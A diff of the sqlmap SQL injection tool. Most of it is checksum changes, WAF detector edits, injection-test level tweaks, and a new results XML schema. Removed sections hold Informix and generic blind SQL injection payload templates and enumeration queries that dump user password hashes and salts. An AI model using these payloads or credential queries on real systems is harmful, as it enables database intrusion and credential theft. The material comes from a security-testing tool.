@@ -241,7 +235,6 @@ e2aca0ea57afc24dd154472034dc9c8c tamper/commalessmid.py
11bb0652668bb6624494567fd92933b3 tamper/escapequotes.py
731c25dd33fca28514930d4409daaaa3 tamper/greatest.py
1becabc90d81c70fd24b54cae03a3702 tamper/halfversionedmorekeywords.py
61add9dce3c0c9035901db87fa969c89 tamper/htmlencode.py
17313c5a68aa44325616e0e38869b98e tamper/ifnull2ifisnull.py
dd71bbc7f76ef55a2c9c16645347ead8 tamper/informationschemacomment.py
cc9c82cfffd8ee9b25ba3af6284f057e tamper/__init__.py
@@ -318,7 +311,7 @@ ee25f2a03587e2c283eab0b36c9e5783 thirdparty/chardet/sbcsgroupprober.py
c9349824f2647962175d321cc0c52134 thirdparty/chardet/sjisprober.py
bcae4c645a737d3f0e7c96a66528ca4a thirdparty/chardet/universaldetector.py
6f8b3e25472c02fb45a75215a175991f thirdparty/chardet/utf8prober.py
658da0466b798cc70f48f35fe49b7813 thirdparty/clientform/clientform.py
b678dcd25ecb1533ffe2493b6e711bb1 thirdparty/clientform/clientform.py
722281d87fb13ec22555480f8f4c715b thirdparty/clientform/__init__.py
0b625ccefa6b066f79d3cbb3639267e6 thirdparty/colorama/ansi.py
e52252bb81ce1a14b7245b53af33e75f thirdparty/colorama/ansitowin32.py
@@ -336,7 +329,7 @@ e0c6a936506bffeed53ce106ec15942d thirdparty/keepalive/keepalive.py
d41d8cd98f00b204e9800998ecf8427e thirdparty/magic/__init__.py
49f0d123e044dd32a452e2fe51f1a9c3 thirdparty/magic/magic.py
d41d8cd98f00b204e9800998ecf8427e thirdparty/multipart/__init__.py
03c8abc17b228e59bcfda1f11a9137e0 thirdparty/multipart/multipartpost.py
fd52df5770ee286a7c186fdd2ccc4e0c thirdparty/multipart/multipartpost.py
3e502b04f3849afbb7f0e13b5fd2b5c1 thirdparty/odict/__init__.py
127fe54fdb9b13fdac93c8fc9c9cad5e thirdparty/odict/odict.py
08801ea0ba9ae22885275ef65d3ee9dc thirdparty/oset/_abc.py
@@ -358,22 +351,22 @@ ea649aae139d8551af513769dd913dbf thirdparty/termcolor/termcolor.py
1501fa7150239b18acc0f4a9db2ebc0d udf/mysql/linux/64/lib_mysqludf_sys.so_
7824059e8fc87c4a565e774676e2f1eb udf/mysql/windows/32/lib_mysqludf_sys.dll_
7fed5b8e99e36ce255c64527ec61a995 udf/mysql/windows/64/lib_mysqludf_sys.dll_
0ee1310d4e2a4cc5a7295df01a3a78bf udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_
c7d9e1fcac5f047edf17d79a825fb64b udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_
ec41a080f4570c3866b9a7219f7623c4 udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_
337e2b84dfb089d1ba78323ab2fd21bd udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_
e3234ad91b65c476e69743b196ea8394 udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_
2e39682ab7f7f9d6bcce6a3f9dac576b udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_
b17ade3fe472b00f6d4d655f0d1036b2 udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_
3dfc42ea62f5db4196a1b736c603ef0f udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_
fe297bfe5e27e7f99d64b2d6baa766fe udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_
d7ce763983f5ef4cdae07480c7e16c36 udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_
f9e5d7a8f1fbd8df80d07f72ada0251b udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_
10a20abaf98ff25527702c7e37187427 udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_
0b5158292758f4a67cb1bdfcefcd4ef3 udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_
1d8eb0e3d38f1265ea1bef7f9ec60230 udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_
1222dac08cf53e31e74e350a2c17452f udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_
27761c5e046da59f1f1e11f6d194e38a udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_
6b4dc184e545d7bd5e7c31590647471d udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_
8c5573d1da59024c47d00cc8492a92df udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_
b9930f6bf43780fff469bc40e20599c3 udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_
6930b6d67f4d52b5c1663ac2d8460576 udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_
5c177ee2cffad6133e99a24d1f913660 udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_
4d0c06a51c5b03b41ad4df33a304d282 udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_
db0b1fe75fd9db96c1fc6ab42ae76d70 udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_
df8524a627568864e1de516bbe5718ef udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_
3c3e3b72fa5b5860108a0350a0604ba2 udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_
b10e351f5d8c07fdf08dc3f44b00c01c udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_
7714b28ee7669f60a2321f1b4ce6bba8 udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_
9911482642131fd3be6a03a28294d24a udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_
fed2ed6df3f809b1019e9a0ee102799d udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_
d5d004b396ca5b14afe03a294d42c475 udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_
5b79d7f667a0e1e4a70a5ceb70107cbe udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_
b396f050d36e82baf2724f140165fbd5 udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_
a6b9c964f7c7d7012f8f434bbd84a041 udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_
d9006810684baf01ea33281d21522519 udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_
ca3ab78d6ed53b7f2c07ed2530d47efd udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_
@@ -407,7 +400,7 @@ cc9c82cfffd8ee9b25ba3af6284f057e waf/__init__.py
32516985d3cb0aeeb1bf28062820b045 waf/kona.py
c3de612a7960b08e1e7f97aa05b58df1 waf/modsecurity.py
dc79a2e675d17df4cba1f8b839cbc11b waf/netcontinuum.py
8d3230fa3c6a7e41dc85dd04c95db044 waf/netscaler.py
c218fd16246dfbbd0485cb3456182c71 waf/netscaler.py
4e05b8169e53edd36a6269e937958744 waf/newdefend.py
80eb59b4dcb62de8c97bd1bebbfb3f80 waf/nsfocus.py
477c3b6b31e8eb1fe836bd5a24c9fab2 waf/paloalto.py
@@ -433,7 +426,6 @@ b5ea5375df444e0240f1ee0e2a8e52fb waf/trafficshield.py
7a723ce2f1b82d7297a2ab025d5ca0be waf/webappsecure.py
75e51fea7f206e8faa2f743e44e58383 waf/webknight.py
3bcac085dcd9ed26b50a2320e418e9f3 waf/yundun.py
2a57f322f0b6e7b11b8df0909816a34f waf/yunsuo.py
2d53fdaca0d7b42edad5192661248d76 xml/banner/cookie.xml
37603bc0905af0c65480a2ca959990ec xml/banner/generic.xml
d8925c034263bf1b83e7d8e1c78eec57 xml/banner/mssql.xml
@@ -447,11 +439,11 @@ d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml
2394458d582a636c52342cff33ae3035 xml/banner/x-powered-by.xml
fb93505ef0ab3b4a20900f3e5625260d xml/boundaries.xml
535d625cff8418bdc086ab4e1bbf5135 xml/errors.xml
a279656ea3fcb85c727249b02f828383 xml/livetests.xml
4b266898af8b7f380db910511de24ec4 xml/payloads/boolean_blind.xml
2e13b9e0a51768969d4ccc02cf62ea70 xml/livetests.xml
18b2c7e5738a3be72d759af96a9aaddf xml/payloads/boolean_blind.xml
103a4c9b12c582b24a3fac8147a9c8d4 xml/payloads/error_based.xml
06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml
3194e2688a7576e1f877d5b137f7c260 xml/payloads/stacked_queries.xml
c2d8dd03db5a663e79eabb4495dd0723 xml/payloads/time_blind.xml
ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml
1587a02322a96ac48973e782d6fedf73 xml/queries.xml
96adb9bfbab867d221974d3ddb303cb6 xml/payloads/stacked_queries.xml
c8b152ecebf04ec997e52c6c78cbd488 xml/payloads/time_blind.xml
033b39025e8ee0f302935f6db3a39e77 xml/payloads/union_query.xml
313c0e1cc42de27a29c0e0ac67fee71d xml/queries.xml

View File

@@ -471,7 +471,6 @@ settingsid
lname
sale_date
module_addr
flag
# spanish
usuario

View File

@@ -1615,7 +1615,6 @@ SPACE
geo_Sea
DATA_ORG
Contributor
flag
# Various Joomla tables
jos_vm_product_download

File diff suppressed because it is too large Load Diff

View File

@@ -18,7 +18,7 @@ def detect(get_page):
for vector in WAF_ATTACK_VECTORS:
_, headers, _ = get_page(get=vector)
retval = re.search(r"\Aclose", headers.get("Cneonction", "") or headers.get("nnCoection", ""), re.I) is not None
retval |= re.search(r"\A(ns_af=|citrix_ns_id|NSC_)", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
retval = re.search(r"\A(ns_af=|citrix_ns_id|NSC_)", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
retval |= re.search(r"\ANS-CACHE", headers.get(HTTP_HEADER.VIA, ""), re.I) is not None
if retval:
break

View File

@@ -1,25 +0,0 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import re
from lib.core.enums import HTTP_HEADER
from lib.core.settings import WAF_ATTACK_VECTORS
__product__ = "Yunsuo Web Application Firewall (Yunsuo)"
def detect(get_page):
retval = False
for vector in WAF_ATTACK_VECTORS:
page, headers, _ = get_page(get=vector)
retval = re.search(r"<img class=\"yunsuologo\"", page, re.I) is not None
retval |= re.search(r"yunsuo_session", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
if retval:
break
return retval

File diff suppressed because it is too large Load Diff

View File

@@ -841,44 +841,6 @@ Tag: <test>
</details>
</test>
<test>
<title>Informix boolean-based blind - Parameter replace</title>
<stype>1</stype>
<level>3</level>
<risk>1</risk>
<clause>1,3</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)</vector>
<request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)</payload>
</request>
<response>
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)</comparison>
</response>
<details>
<dbms>Informix</dbms>
</details>
</test>
<test>
<title>Informix boolean-based blind - Parameter replace (original value)</title>
<stype>1</stype>
<level>4</level>
<risk>1</risk>
<clause>1,3</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)</vector>
<request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)</payload>
</request>
<response>
<comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)</comparison>
</response>
<details>
<dbms>Informix</dbms>
</details>
</test>
<test>
<title>Microsoft Access boolean-based blind - Parameter replace</title>
<stype>1</stype>
@@ -917,6 +879,44 @@ Tag: <test>
</details>
</test>
<test>
<title>SAP MaxDB boolean-based blind - Parameter replace</title>
<stype>1</stype>
<level>3</level>
<risk>1</risk>
<clause>1,3</clause>
<where>3</where>
<vector>(CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE NULL END)</vector>
<request>
<payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE NULL END)</payload>
</request>
<response>
<comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE NULL END)</comparison>
</response>
<details>
<dbms>SAP MaxDB</dbms>
</details>
</test>
<test>
<title>SAP MaxDB boolean-based blind - Parameter replace (original value)</title>
<stype>1</stype>
<level>4</level>
<risk>1</risk>
<clause>1,3</clause>
<where>3</where>
<vector>(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>
<request>
<payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>
</request>
<response>
<comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)</comparison>
</response>
<details>
<dbms>SAP MaxDB</dbms>
</details>
</test>
<!-- Works in MySQL, Oracle, etc. -->
<test>
<title>Boolean-based blind - Parameter replace (DUAL)</title>
@@ -951,40 +951,6 @@ Tag: <test>
</test>
<!-- End of boolean-based blind tests - Parameter replace -->
<!-- Works in SAP MaxDB, Informix, etc. -->
<test>
<title>Boolean-based blind - Parameter replace (CASE)</title>
<stype>1</stype>
<level>2</level>
<risk>1</risk>
<clause>1,3</clause>
<where>3</where>
<vector>(CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE NULL END)</vector>
<request>
<payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE NULL END)</payload>
</request>
<response>
<comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE NULL END)</comparison>
</response>
</test>
<test>
<title>Boolean-based blind - Parameter replace (CASE) (original value)</title>
<stype>1</stype>
<level>3</level>
<risk>1</risk>
<clause>1,3</clause>
<where>3</where>
<vector>(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>
<request>
<payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>
</request>
<response>
<comparison>(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)</comparison>
</response>
</test>
<!-- End of boolean-based blind tests - Parameter replace -->
<!-- Boolean-based blind tests - ORDER BY, GROUP BY clause -->
<test>
<title>MySQL &gt;= 5.0 boolean-based blind - ORDER BY, GROUP BY clause</title>

View File

@@ -5,7 +5,7 @@
<test>
<title>MySQL &gt; 5.0.11 stacked queries (comment)</title>
<stype>4</stype>
<level>2</level>
<level>1</level>
<risk>1</risk>
<clause>0</clause>
<where>1</where>
@@ -26,7 +26,7 @@
<test>
<title>MySQL &gt; 5.0.11 stacked queries</title>
<stype>4</stype>
<level>3</level>
<level>2</level>
<risk>1</risk>
<clause>0</clause>
<where>1</where>
@@ -46,7 +46,7 @@
<test>
<title>MySQL &gt; 5.0.11 stacked queries (query SLEEP - comment)</title>
<stype>4</stype>
<level>3</level>
<level>2</level>
<risk>1</risk>
<clause>0</clause>
<where>1</where>
@@ -67,7 +67,7 @@
<test>
<title>MySQL &gt; 5.0.11 stacked queries (query SLEEP)</title>
<stype>4</stype>
<level>4</level>
<level>3</level>
<risk>1</risk>
<clause>0</clause>
<where>1</where>
@@ -87,7 +87,7 @@
<test>
<title>MySQL &lt; 5.0.12 stacked queries (heavy query - comment)</title>
<stype>4</stype>
<level>3</level>
<level>2</level>
<risk>2</risk>
<clause>0</clause>
<where>1</where>
@@ -107,7 +107,7 @@
<test>
<title>MySQL &lt; 5.0.12 stacked queries (heavy query)</title>
<stype>4</stype>
<level>5</level>
<level>4</level>
<risk>2</risk>
<clause>0</clause>
<where>1</where>

View File

@@ -570,7 +570,7 @@
</test>
<test>
<title>Microsoft SQL Server/Sybase time-based blind (IF)</title>
<title>Microsoft SQL Server/Sybase time-based blind</title>
<stype>5</stype>
<level>1</level>
<risk>1</risk>
@@ -591,7 +591,7 @@
</test>
<test>
<title>Microsoft SQL Server/Sybase time-based blind (IF - comment)</title>
<title>Microsoft SQL Server/Sybase time-based blind (comment)</title>
<stype>5</stype>
<level>4</level>
<risk>1</risk>
@@ -1337,85 +1337,7 @@
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<test>
<title>Informix AND time-based blind (heavy query)</title>
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
<request>
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>Informix</dbms>
</details>
</test>
<test>
<title>Informix OR time-based blind (heavy query)</title>
<stype>5</stype>
<level>2</level>
<risk>3</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
<request>
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>Informix</dbms>
</details>
</test>
<test>
<title>Informix AND time-based blind (heavy query - comment)</title>
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
<request>
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
<comment>--</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>Informix</dbms>
</details>
</test>
<test>
<title>Informix OR time-based blind (heavy query - comment)</title>
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
<request>
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
<comment>--</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>Informix</dbms>
</details>
</test>
<!-- TODO: if possible, add payload for Microsoft Access -->
<!-- End of time-based boolean tests -->
<!-- Time-based boolean tests - Numerous clauses -->
@@ -1775,7 +1697,7 @@
<dbms>IBM DB2</dbms>
</details>
</test>
<!-- Untested -->
<test>
<title>HSQLDB &gt;= 1.7.2 time-based blind - Parameter replace (heavy query)</title>
@@ -1816,25 +1738,6 @@
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<test>
<title>Informix time-based blind - Parameter replace (heavy query)</title>
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR) ELSE [RANDNUM] END)</vector>
<request>
<payload>(SELECT COUNT(*) FROM SYSMASTER:SYSPAGHDR)</payload>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>Informix</dbms>
</details>
</test>
<!-- End of time-based boolean tests - Parameter replace -->
<!-- Time-based boolean tests - ORDER BY, GROUP BY clause -->
@@ -2035,6 +1938,6 @@
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<!-- TODO: if possible, add payload for Microsoft Access -->
<!-- End of time-based boolean tests - ORDER BY, GROUP BY clause -->
</root>

View File

@@ -346,7 +346,7 @@
<test>
<title>MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>
<stype>6</stype>
<level>2</level>
<level>1</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
@@ -368,7 +368,7 @@
<test>
<title>MySQL UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>
<stype>6</stype>
<level>2</level>
<level>1</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
@@ -412,7 +412,7 @@
<test>
<title>MySQL UNION query ([CHAR]) - 1 to 10 columns</title>
<stype>6</stype>
<level>2</level>
<level>1</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>
@@ -434,7 +434,7 @@
<test>
<title>MySQL UNION query (NULL) - 1 to 10 columns</title>
<stype>6</stype>
<level>2</level>
<level>1</level>
<risk>1</risk>
<clause>1,2,3,4,5</clause>
<where>1</where>

View File

@@ -714,67 +714,4 @@
<inband query="SELECT table_schem,table_name FROM INFORMATION_SCHEMA.SYSTEM_COLUMNS WHERE %s" condition="column_name" condition2="table_schem" condition3="table_name"/>
</search_column>
</dbms>
<!-- Informix -->
<!-- https://www.ibm.com/support/knowledgecenter/SSGU8G_11.70.0/com.ibm.sqlr.doc/ids_sqr_072.htm -->
<!-- https://www.ibm.com/support/knowledgecenter/SSGU8G_12.1.0/com.ibm.sec.doc/ids_am_041.htm -->
<dbms value="Informix">
<cast query="RTRIM(TO_CHAR(%s))"/>
<length query="CHAR_LENGTH(RTRIM(%s))"/>
<isnull query="NVL(%s,' ')"/>
<delimiter query="||"/>
<limit query="SELECT SKIP %d LIMIT 1"/>
<limitregexp query="\s+SKIP\s+([\d]+)\s*LIMIT\s*([\d]+)"/>
<limitgroupstart query="1"/>
<limitgroupstop query="2"/>
<limitstring query=" LIMIT "/>
<order query="ORDER BY %s ASC"/>
<count query="COUNT(%s)"/>
<comment query="--"/>
<substring query="SUBSTR((%s),%d,%d)"/>
<concatenate query="%s||%s"/>
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END) FROM SYSMASTER:SYSDUAL"/>
<hex query="HEX(%s)"/>
<!-- http://www.dbforums.com/showthread.php?1660588-select-first-and-union&p=6478613#post6478613 -->
<inference query="ASCII(SUBSTR((SELECT * FROM (%s)),%d,1))>%d"/>
<banner query="SELECT DBINFO('VERSION','FULL') FROM SYSMASTER:SYSDUAL"/>
<current_user query="SELECT USER FROM SYSMASTER:SYSDUAL"/>
<current_db query="SELECT DBINFO('DBNAME') FROM SYSMASTER:SYSDUAL"/>
<hostname query="SELECT DBINFO('DBHOSTNAME') FROM SYSMASTER:SYSDUAL"/>
<table_comment/>
<column_comment/>
<is_dba query="(SELECT USERTYPE FROM SYSUSERS WHERE USERNAME=USER)='D'"/>
<users>
<inband query="SELECT USERNAME FROM SYSUSERS"/>
<blind query="SELECT SKIP %d LIMIT 1 USERNAME FROM SYSUSERS ORDER BY USERNAME" count="SELECT COUNT(USERNAME) FROM SYSUSERS"/>
</users>
<passwords>
<inband query="SELECT USERNAME,HASHED_PASSWORD||':'||SALT FROM SYSUSER:SYSINTAUTHUSERS" condition="USERNAME"/>
<blind query="SELECT HASHED_PASSWORD||':'||SALT FROM SYSUSER:SYSINTAUTHUSERS WHERE USERNAME='%s'"/>
</passwords>
<privileges>
<inband query="SELECT USERNAME,USERTYPE FROM SYSUSERS" condition="USERNAME"/>
<blind query="SELECT USERTYPE FROM SYSUSERS WHERE USERNAME='%s'"/>
</privileges>
<roles/>
<dbs>
<inband query="SELECT NAME FROM SYSMASTER:SYSDATABASES"/>
<blind query="SELECT SKIP %d LIMIT 1 NAME FROM SYSMASTER:SYSDATABASES ORDER BY NAME" count="SELECT COUNT(NAME) FROM SYSMASTER:SYSDATABASES"/>
</dbs>
<tables>
<inband query="SELECT TABNAME FROM %s:SYSTABLES WHERE TABTYPE='T' AND TABID>99"/>
<blind query="SELECT SKIP %d LIMIT 1 TABNAME FROM %s:SYSTABLES WHERE TABTYPE='T' AND TABID>99 ORDER BY TABNAME" count="SELECT COUNT(TABNAME) FROM %s:SYSTABLES WHERE TABTYPE='T' AND TABID>99"/>
</tables>
<columns>
<inband query="SELECT COLNAME,COLTYPE FROM %s:SYSTABLES,%s:SYSCOLUMNS WHERE %s:SYSTABLES.TABID=%s:SYSCOLUMNS.TABID AND %s:SYSTABLES.TABNAME='%s'" condition="COLNAME"/>
<blind query="SELECT SKIP %d LIMIT 1 COLNAME FROM %s:SYSTABLES,%s:SYSCOLUMNS WHERE %s:SYSTABLES.TABID=%s:SYSCOLUMNS.TABID AND %s:SYSTABLES.TABNAME='%s' ORDER BY COLNAME" query2="SELECT COLTYPE FROM %s:SYSTABLES,%s:SYSCOLUMNS WHERE %s:SYSTABLES.TABID=%s:SYSCOLUMNS.TABID AND %s:SYSTABLES.TABNAME='%s' AND COLNAME='%s'" count="SELECT COUNT(COLNAME) FROM %s:SYSTABLES,%s:SYSCOLUMNS WHERE %s:SYSTABLES.TABID=%s:SYSCOLUMNS.TABID AND %s:SYSTABLES.TABNAME='%s'" condition="COLNAME"/>
</columns>
<dump_table>
<inband query="SELECT %s FROM %s:%s"/>
<blind query="SELECT SKIP %d LIMIT 1 %s FROM %s:%s ORDER BY %s" count="SELECT COUNT(*) FROM %s:%s"/>
</dump_table>
<search_db/>
<search_table/>
<search_column/>
</dbms>
</root>

284
xml/sqlmap.xsd Normal file
View File

@@ -0,0 +1,284 @@
<?xml version="1.0" encoding="utf-8"?>
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema" elementFormDefault="qualified">
<xs:element name="Results">
<xs:complexType>
<xs:all>
<xs:element ref="Messages" minOccurs="0" />
<xs:element ref="Banner" minOccurs="0"/>
<xs:element ref="CurrentUser" minOccurs="0"/>
<xs:element ref="CurrentDB" minOccurs="0"/>
<xs:element ref="isDBA" minOccurs="0"/>
<xs:element ref="Users" minOccurs="0"/>
<xs:element ref="UserSettings" minOccurs="0"/>
<xs:element ref="DBs" minOccurs="0"/>
<xs:element ref="DBTables" minOccurs="0"/>
<xs:element ref="Technics" minOccurs="0" />
<xs:element ref="Lists" minOccurs="0" />
<xs:element ref="DatabaseColumns" minOccurs="0" />
<xs:element ref="DBValues" minOccurs="0"/>
<xs:element ref="Queries" minOccurs="0"/>
<xs:element ref="RegistryEntries" minOccurs="0"/>
<xs:element ref="FileContent" minOccurs="0"/>
<xs:element ref="Status"/>
</xs:all>
</xs:complexType>
</xs:element>
<!-- Simple Types -->
<xs:element name="Banner" type="xs:string"/>
<xs:element name="CurrentUser" type="xs:string"/>
<xs:element name="CurrentDB" type="xs:string"/>
<!-- File Content -->
<xs:element name="FileContent">
<xs:complexType mixed="true">
<xs:attribute name="name" use="required" type="xs:string"/>
</xs:complexType>
</xs:element>
<!-- RegistryEntries -->
<xs:element name="RegistryEntries">
<xs:complexType>
<xs:sequence>
<xs:element ref="RegisterData" maxOccurs="unbounded"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="RegisterData" type="xs:string"/>
<!-- Queries -->
<xs:element name="Queries">
<xs:complexType>
<xs:sequence>
<xs:element ref="Query" maxOccurs="unbounded"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="Query">
<xs:complexType mixed="true">
<xs:attribute name="value" use="required" type="xs:string"/>
</xs:complexType>
</xs:element>
<!-- Columns -->
<xs:element name="DatabaseColumns">
<xs:complexType>
<xs:sequence>
<xs:element ref="DB" minOccurs="0" maxOccurs="unbounded"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="DB">
<xs:complexType mixed="true">
<xs:sequence>
<xs:element ref="Table" minOccurs="0" maxOccurs="unbounded"/>
</xs:sequence>
<xs:attribute name="name" use="required" type="xs:string"/>
</xs:complexType>
</xs:element>
<xs:element name="Table">
<xs:complexType mixed="true">
<xs:sequence>
<xs:element ref="Column" minOccurs="0" maxOccurs="unbounded"/>
</xs:sequence>
<xs:attribute name="name" use="required" type="xs:string"/>
</xs:complexType>
</xs:element>
<xs:element name="Column">
<xs:complexType mixed="true">
<xs:attribute name="type" use="required" type="xs:string"/>
</xs:complexType>
</xs:element>
<!-- List -->
<xs:element name="Member">
<xs:complexType mixed="true">
<xs:sequence>
<xs:element ref="Member" minOccurs="0" maxOccurs="unbounded"/>
</xs:sequence>
<xs:attribute name="type" use="required" type="xs:string"/>
</xs:complexType>
</xs:element>
<xs:element name="List">
<xs:complexType mixed="true">
<xs:sequence>
<xs:element ref="Member" minOccurs="0" maxOccurs="unbounded"/>
</xs:sequence>
<xs:attribute name="type" use="required" type="xs:string"/>
</xs:complexType>
</xs:element>
<xs:element name="Lists">
<xs:complexType>
<xs:sequence>
<xs:element ref="List" minOccurs="0" maxOccurs="unbounded"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<!-- Technics -->
<xs:element name="Technics">
<xs:complexType>
<xs:sequence>
<xs:element ref="Technic" minOccurs="0" maxOccurs="unbounded"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="Technic">
<xs:complexType mixed="true">
<xs:attribute name="type" use="required" type="xs:string"/>
</xs:complexType>
</xs:element>
<!-- Messages -->
<xs:element name="Messages">
<xs:complexType>
<xs:sequence>
<xs:element ref="Message" maxOccurs="unbounded"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="Message">
<xs:complexType mixed="true">
<xs:attribute name="type" use="required" type="xs:string"/>
</xs:complexType>
</xs:element>
<!-- is DBA -->
<xs:element name="isDBA">
<xs:complexType>
<xs:attribute name="value" use="required" type="xs:NCName"/>
</xs:complexType>
</xs:element>
<!-- Users -->
<xs:element name="Users">
<xs:complexType>
<xs:sequence>
